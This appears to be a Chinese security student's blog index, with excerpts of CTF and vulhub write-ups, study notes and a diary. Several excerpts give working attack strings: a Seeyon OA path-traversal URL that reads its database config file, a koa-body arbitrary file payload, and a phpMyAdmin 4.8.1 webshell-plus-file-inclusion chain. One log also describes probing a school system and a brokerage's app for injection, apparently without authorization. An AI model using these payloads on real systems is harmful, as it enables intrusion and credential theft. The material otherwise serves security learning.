no-title

致远oa

任意文件下载

/seeyon/webmail.do?method=doDownloadAtt&filename=conf&filePath=../conf/datasourceCtp.properties

Mehr lesen

vulhub复现记录-2

Joomla

Joomla!是一套全球知名的内容管理系统,是使用PHP语言加上MySQL数据库所开发的软件系统

Mehr lesen

java学习笔记

helloworld

javac是java的编译器,.java编译成.class,java运行class文件,类名和java文件名必须一致

1
2
3
4
5
6
public class HelloWorld {
//第二句不变,main函数是程序的起点
public static void main(String []args) {
System.out.println("Hello World!");
}
}

Mehr lesen

vulhub复现记录

fastjson

搭建rmi服务,编译java文件,搭建好攻击环境
post传不合法的json格式数据,根据报错判断是不是fastjson
也可以用burpsuite插件 自动检测fastjson rce的py插件,可检测1.2.24和1.2.47
检测是否存在漏洞可以用dnslog

Mehr lesen

7月6日周记录

day1

上午下了个夜神模拟器,配置好代理,测试抓app的包,然后试着挖了一下学校的微信公众号,无果。
下午花了2-3个小时尝试挖了一下学校教务系统,青果教务,发现是jboos4.2框架,在网上有几个cve,试了一下,发现都不存在。
然后去挖中原证券的微信公众号,找到一个tp3.2.3搭的网站,试了几个注入,感觉是修复了,然后测了很久的开户功能,也不存在验证码的问题,验证都是在后端
最后看了一下上周末xctf分站赛sctf的两道题,有用到file_put_contents的小tricks,之前在公众号看过,当时粗略的看了一下,今天认真看了一遍
https://cyc1e183.github.io/2020/04/03/%E5%85%B3%E4%BA%8Efile_put_contents%E7%9A%84%E4%B8%80%E4%BA%9B%E5%B0%8F%E6%B5%8B%E8%AF%95/
还有一个是koa的issues https://github.com/dlau/koa-body/issues/75 上传接口存在任意文件复制,还可以下载,payload

1
{"files": {"uploads": [{"path": "/any/file/path"}]}}

Mehr lesen

buu按顺序刷题知识点小结

[PHPMYADMIN]CVE-2018-12613

漏洞分析见此处
index.php 的target存在任意文件包含 ,绕过过滤即可,版本是4.8.1
先执行sql语句 SELECT ‘<?=eval($_REQUEST[1])?>’;
然后 包含session index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_dfc4d1ce67fb8827bbdeabf3bfe8d172&1=system(‘env’);
如果找不到session的话也可以用上面文章的方法,把WebShell当做数据表的字段值写入到数据库文件中,然后包含数据库文件即可

Mehr lesen

GkCTF

难度一般般,打得很差,自闭了,我菜,我爬

Mehr lesen

2020网鼎后三场wp

白虎

PicDown

过滤了file,两种解法local-file协议 或者// pyhton中两个斜杠代表file协议 buu的环境用不了local-file
读一下///proc/self/cmdline 得到app.py 然后读一下///proc/self/cwd/app.py 读///proc/self/fd/3 得到密码

Mehr lesen

2020网鼎杯wp

AreUSerialz

一个简单的反序列化读文件,坑点在于web目录不是默认的,apache配置文件路径也不是默认的
之前出题的时候遇到了这个问题,php在析构方法中工作路径变成了php主程序的路径,所以必须是绝对路径才能读到文件
这里记录下这题的几个方法

Mehr lesen

。。。

唉,打的比赛也不少了,刷的题也不少了,还是这么菜,今天jb哥退群,给我说打到现在也没打出什么名堂
我想了想也是,大一水了一年,大二才真正开始学,啥奖都没拿过,打比赛题都不怎么会,有时候想想自己可能真的不适合ctf
当初一直想学渗透来着,莫名其妙转了ctf,现在是渗透渗透不会,比赛比赛打不好,马上就要大三了,web刷题永无止境,累了
就看明天网鼎能不能进线下了 冲冲冲

Mehr lesen